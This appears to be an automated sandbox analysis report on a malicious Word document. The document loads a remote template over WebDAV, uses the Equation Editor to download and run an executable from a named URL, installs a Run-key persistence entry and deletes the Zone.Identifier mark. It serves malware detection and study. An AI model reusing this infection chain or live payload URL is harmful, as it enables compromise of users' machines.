Source: 9.2.html.exe.3bf41c0.11.raw.unpack, sqh1bsK2vmbKu3bQAB.cs	.Net Code: JQN64AOHtZ System.Reflection.Assembly.Load(byte[])

Source: html[1].exe.8.dr

Static PE information: 0xD5E299B3 [Fri Sep 17 09:04:51 2083 UTC]

Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_041D4A62 pushfd ; iretd	11_2_041D4A63
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_041D4A88 pushfd ; iretd	11_2_041D4A8A
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_041D4AB0 pushfd ; iretd	11_2_041D4AB1
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_041D4ADE pushfd ; iretd	11_2_041D4AE0
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_041D3582 push FFFFFFB1h; iretd	11_2_041D3584
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 16_2_004509AE push esp; ret	16_2_004509B1

Source: html[1].exe.8.dr	Static PE information: section name: .text entropy: 7.974040091751685
Source: html.exe.8.dr	Static PE information: section name: .text entropy: 7.974040091751685

Source: 9.2.html.exe.4f0000.2.raw.unpack, XG.cs	High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
Source: 9.2.html.exe.5e60000.12.raw.unpack, kVWBZIYGc1LsJp5DQC.cs	High entropy of concatenated method names: 'zD14Z7WcE', 'aY2g3LtAi', 'RAtPTM3MA', 'gVDtcvhDa', 'sLSNk4svb', 'DcRXfOqYj', 'FXmjulmWVmfYLi21Oc', 'gQZfR5kDT1mXABj1ut', 'd2gU3afqw', 'RONZ9wucu'
Source: 9.2.html.exe.5e60000.12.raw.unpack, PG32fLbBvBC9PvSoKS.cs	High entropy of concatenated method names: 'j45kgXNccs', 'hYgkPuBayc', 'm8Gk9g0y4O', 'yfukNfxyGw', 'aWOk7b1H5O', 'JnCkWHYtDS', 'JNtkGH2qeg', 'GJUkUPpWyH', 'NnMkAWnliM', 'nLbkZ72F5f'
Source: 9.2.html.exe.5e60000.12.raw.unpack, uXn2oFWUJpYUoMT4q5.cs	High entropy of concatenated method names: 'dr4Gs83GRi', 'oJyGiPP4es', 'HMfUCmhs6o', 'FtbUFblDEj', 'BclGO0MmLj', 'nHSG0u2IJ2', 'hFMG3tT10B', 'NW5GruvZps', 'pkHGQWjRMj', 'kIPGdheVEc'
Source: 9.2.html.exe.5e60000.12.raw.unpack, UWRVFXGi90YJhK0jor.cs	High entropy of concatenated method names: 'dfNUYfQCFj', 'wEPUTiOkcE', 'pFRUlkCxTA', 'fi3UMLcvpj', 'goLUr9Zqg4', 'ioEUngA4yI', 'Next', 'Next', 'Next', 'NextBytes'
Source: 9.2.html.exe.5e60000.12.raw.unpack, HpK0UKqYTXMkNldgkl.cs	High entropy of concatenated method names: 'lbGAFX8UUh', 'NGEAmKFdac', 'VCrA6dwFQ6', 'FACADN6uk2', 'jutABwb9K4', 'puUAaWwScP', 'XieAJA7ufc', 'cYNUHZHhQY', 'U0dUs1aLBs', 'IrpUwkWRTH'
Source: 9.2.html.exe.5e60000.12.raw.unpack, BLOAyHyYSiUZUlxD9k.cs	High entropy of concatenated method names: 'PX0V9CtgVk', 'eS1VNRQh9X', 'LmwVY5vbYS', 'ERkVTAcsCl', 'Gj7VMFViKJ', 'WA0VnxbCYa', 'hLfVc6Jki3', 'LscVKJjLvv', 'J8KVEgoRDY', 'WQSVODqTjE'
Source: 9.2.html.exe.5e60000.12.raw.unpack, zHtxCJ1N2JoO48Z6lI.cs	High entropy of concatenated method names: 'OGTG2Ght1E', 'ddhG50ueeN', 'ToString', 'zHHGDd9YpT', 'zWRGB8iwOh', 'PJFGkRTxGi', 'mbkGa0whWA', 'EoFGJbYNQY', 'lraGxylQAo', 'vrcGoHBw7s'
Source: 9.2.html.exe.5e60000.12.raw.unpack, J38WN0MuLBWdDdXjtWo.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uEwZrb5DAM', 'NtUZQiG1kG', 'QwFZdmNvQ0', 'kSuZeDupbq', 'HL2ZyB4HNI', 'HxTZqfwGh1', 'ugGZHDX7xH'
Source: 9.2.html.exe.5e60000.12.raw.unpack, O12eRO598n0U73Lpkf.cs	High entropy of concatenated method names: 'zrGJfDk0FH', 'VXjJB4JmrI', 'yu1Jap9Rr7', 'kolJxOAD4J', 'HecJowBvsI', 'VHxaywAt3h', 'mMWaq2edhS', 'LCTaHTcm4q', 'ikDasicJMB', 'inrawZ13ok'
Source: 9.2.html.exe.5e60000.12.raw.unpack, udHJLbJbS6nBCo8rlA.cs	High entropy of concatenated method names: 'Dispose', 'NELFwrbqWp', 'k1ORTg5VMs', 'jb5vvpb8Yp', 'og3Firus1T', 'b6dFz6oR6d', 'ProcessDialogKey', 'xbaRC78q29', 'eAgRFZODXk', 'bUMRRWavoA'
Source: 9.2.html.exe.5e60000.12.raw.unpack, uqwCXNwbcnMqM8iwfa.cs	High entropy of concatenated method names: 'UANUDVPPrB', 'a5bUBCEr9d', 'K2XUk1Zlvy', 'KSvUaUwMh2', 'py7UJginwy', 'wv1UxR7V5E', 'tD7UoxvDwY', 'HYGUStojtp', 'LcHU26kFqU', 'xLAU55dxLu'
Source: 9.2.html.exe.5e60000.12.raw.unpack, sqh1bsK2vmbKu3bQAB.cs	High entropy of concatenated method names: 'YOhmfdii8W', 'UUcmDiqBva', 's07mBv3J2t', 'NYfmkxvuiJ', 'pwXma7TJBL', 'lh6mJp0TDL', 'SHdmxQyV6j', 'iq6mou4qT8', 'YgxmSQUYSe', 'gxtm2TOB9u'
Source: 9.2.html.exe.5e60000.12.raw.unpack, jBDgLqMLPkY7tSbGPhJ.cs	High entropy of concatenated method names: 'UbkA8ULCYc', 'GAIAjHkMHE', 'QHdA48iXuW', 'qXMAgthhYo', 'mYuAuZIvLM', 'TdNAPcme8P', 'BmkAt2Joed', 'zPoA9HjHPV', 'lHiANABDTT', 'WyYAXuRUpR'
Source: 9.2.html.exe.5e60000.12.raw.unpack, OrnLL9jIcMuvJxc1rQ.cs	High entropy of concatenated method names: 'UmIx8QbjjA', 'VCYxjXon6U', 'XABx47BWUG', 'ShtxgB0U62', 'nHrxuVthfm', 'VjaxPQGXpm', 'EQcxtG3LYP', 'fT3x9KKs5V', 'KbaxN38aOR', 'okGxX0sWwN'
Source: 9.2.html.exe.5e60000.12.raw.unpack, PcBFR2elvHTvWr6EEl.cs	High entropy of concatenated method names: 'kA4FxQoxrD', 'luVFosHmNS', 'uFkF2SPtJs', 'vqxF5Vltel', 'XOVF7bB7V9', 'TV2FW9A7DQ', 'YaIloHVSSArgSTFZUG', 'CbEZQfntQjCbJUg9yA', 'Ev0FFAQnkC', 'dReFmlejo7'
Source: 9.2.html.exe.5e60000.12.raw.unpack, JmsVQYzgcRFt7cT77K.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PCOAVKvFXb', 'mckA7XpmIr', 'LtNAWyaBtw', 'HDVAGSlNmt', 'j4rAUtwTby', 'xHhAAkNrk9', 'Tk0AZj0QKX'
Source: 9.2.html.exe.5e60000.12.raw.unpack, SKNwGsNRwam5llK5t6.cs	High entropy of concatenated method names: 'vBeBr8LZD6', 'PsKBQhgKqq', 'ihJBdmbEb6', 'oxuBewBsvC', 'jKRByn7kxv', 'pKDBqp2hum', 'MhOBHtnVv2', 'IF5Bsspd5p', 'jYEBw3TNWk', 'LX7BijH1ap'
Source: 9.2.html.exe.28cf3d0.6.raw.unpack, XG.cs	High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, kVWBZIYGc1LsJp5DQC.cs	High entropy of concatenated method names: 'zD14Z7WcE', 'aY2g3LtAi', 'RAtPTM3MA', 'gVDtcvhDa', 'sLSNk4svb', 'DcRXfOqYj', 'FXmjulmWVmfYLi21Oc', 'gQZfR5kDT1mXABj1ut', 'd2gU3afqw', 'RONZ9wucu'
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, PG32fLbBvBC9PvSoKS.cs	High entropy of concatenated method names: 'j45kgXNccs', 'hYgkPuBayc', 'm8Gk9g0y4O', 'yfukNfxyGw', 'aWOk7b1H5O', 'JnCkWHYtDS', 'JNtkGH2qeg', 'GJUkUPpWyH', 'NnMkAWnliM', 'nLbkZ72F5f'
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, uXn2oFWUJpYUoMT4q5.cs	High entropy of concatenated method names: 'dr4Gs83GRi', 'oJyGiPP4es', 'HMfUCmhs6o', 'FtbUFblDEj', 'BclGO0MmLj', 'nHSG0u2IJ2', 'hFMG3tT10B', 'NW5GruvZps', 'pkHGQWjRMj', 'kIPGdheVEc'
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, UWRVFXGi90YJhK0jor.cs	High entropy of concatenated method names: 'dfNUYfQCFj', 'wEPUTiOkcE', 'pFRUlkCxTA', 'fi3UMLcvpj', 'goLUr9Zqg4', 'ioEUngA4yI', 'Next', 'Next', 'Next', 'NextBytes'
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, HpK0UKqYTXMkNldgkl.cs	High entropy of concatenated method names: 'lbGAFX8UUh', 'NGEAmKFdac', 'VCrA6dwFQ6', 'FACADN6uk2', 'jutABwb9K4', 'puUAaWwScP', 'XieAJA7ufc', 'cYNUHZHhQY', 'U0dUs1aLBs', 'IrpUwkWRTH'
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, BLOAyHyYSiUZUlxD9k.cs	High entropy of concatenated method names: 'PX0V9CtgVk', 'eS1VNRQh9X', 'LmwVY5vbYS', 'ERkVTAcsCl', 'Gj7VMFViKJ', 'WA0VnxbCYa', 'hLfVc6Jki3', 'LscVKJjLvv', 'J8KVEgoRDY', 'WQSVODqTjE'
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, zHtxCJ1N2JoO48Z6lI.cs	High entropy of concatenated method names: 'OGTG2Ght1E', 'ddhG50ueeN', 'ToString', 'zHHGDd9YpT', 'zWRGB8iwOh', 'PJFGkRTxGi', 'mbkGa0whWA', 'EoFGJbYNQY', 'lraGxylQAo', 'vrcGoHBw7s'
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, J38WN0MuLBWdDdXjtWo.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uEwZrb5DAM', 'NtUZQiG1kG', 'QwFZdmNvQ0', 'kSuZeDupbq', 'HL2ZyB4HNI', 'HxTZqfwGh1', 'ugGZHDX7xH'
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, O12eRO598n0U73Lpkf.cs	High entropy of concatenated method names: 'zrGJfDk0FH', 'VXjJB4JmrI', 'yu1Jap9Rr7', 'kolJxOAD4J', 'HecJowBvsI', 'VHxaywAt3h', 'mMWaq2edhS', 'LCTaHTcm4q', 'ikDasicJMB', 'inrawZ13ok'
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, udHJLbJbS6nBCo8rlA.cs	High entropy of concatenated method names: 'Dispose', 'NELFwrbqWp', 'k1ORTg5VMs', 'jb5vvpb8Yp', 'og3Firus1T', 'b6dFz6oR6d', 'ProcessDialogKey', 'xbaRC78q29', 'eAgRFZODXk', 'bUMRRWavoA'
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, uqwCXNwbcnMqM8iwfa.cs	High entropy of concatenated method names: 'UANUDVPPrB', 'a5bUBCEr9d', 'K2XUk1Zlvy', 'KSvUaUwMh2', 'py7UJginwy', 'wv1UxR7V5E', 'tD7UoxvDwY', 'HYGUStojtp', 'LcHU26kFqU', 'xLAU55dxLu'
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, sqh1bsK2vmbKu3bQAB.cs	High entropy of concatenated method names: 'YOhmfdii8W', 'UUcmDiqBva', 's07mBv3J2t', 'NYfmkxvuiJ', 'pwXma7TJBL', 'lh6mJp0TDL', 'SHdmxQyV6j', 'iq6mou4qT8', 'YgxmSQUYSe', 'gxtm2TOB9u'
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, jBDgLqMLPkY7tSbGPhJ.cs	High entropy of concatenated method names: 'UbkA8ULCYc', 'GAIAjHkMHE', 'QHdA48iXuW', 'qXMAgthhYo', 'mYuAuZIvLM', 'TdNAPcme8P', 'BmkAt2Joed', 'zPoA9HjHPV', 'lHiANABDTT', 'WyYAXuRUpR'
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, OrnLL9jIcMuvJxc1rQ.cs	High entropy of concatenated method names: 'UmIx8QbjjA', 'VCYxjXon6U', 'XABx47BWUG', 'ShtxgB0U62', 'nHrxuVthfm', 'VjaxPQGXpm', 'EQcxtG3LYP', 'fT3x9KKs5V', 'KbaxN38aOR', 'okGxX0sWwN'
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, PcBFR2elvHTvWr6EEl.cs	High entropy of concatenated method names: 'kA4FxQoxrD', 'luVFosHmNS', 'uFkF2SPtJs', 'vqxF5Vltel', 'XOVF7bB7V9', 'TV2FW9A7DQ', 'YaIloHVSSArgSTFZUG', 'CbEZQfntQjCbJUg9yA', 'Ev0FFAQnkC', 'dReFmlejo7'
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, JmsVQYzgcRFt7cT77K.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PCOAVKvFXb', 'mckA7XpmIr', 'LtNAWyaBtw', 'HDVAGSlNmt', 'j4rAUtwTby', 'xHhAAkNrk9', 'Tk0AZj0QKX'
Source: 9.2.html.exe.3bf41c0.11.raw.unpack, SKNwGsNRwam5llK5t6.cs	High entropy of concatenated method names: 'vBeBr8LZD6', 'PsKBQhgKqq', 'ihJBdmbEb6', 'oxuBewBsvC', 'jKRByn7kxv', 'pKDBqp2hum', 'MhOBHtnVv2', 'IF5Bsspd5p', 'jYEBw3TNWk', 'LX7BijH1ap'

Persistence and Installation Behavior

Microsoft Office launches external ms-search protocol handler (WebDAV)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\wbze.de\DavWWWRoot			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\wbze.de\DavWWWRoot			Jump to behavior

Contains an external reference to another file

Source: settings.xml.rels

Extracted files from sample: http://wbze.de/u7xc

Office drops RTF file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File dump: beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood[1].doc.0.dr			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File dump: 48255FE9.doc.0.dr			Jump to dropped file

Office viewer loads remote template

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: netapi32.dll and davhlpr.dll loaded

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 8_2_0361062C LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

8_2_0361062C

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\html[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\html.exe	File created: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\html.exe	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\html.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mpTrle			Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mpTrle			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Roaming\html.exe

File opened: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
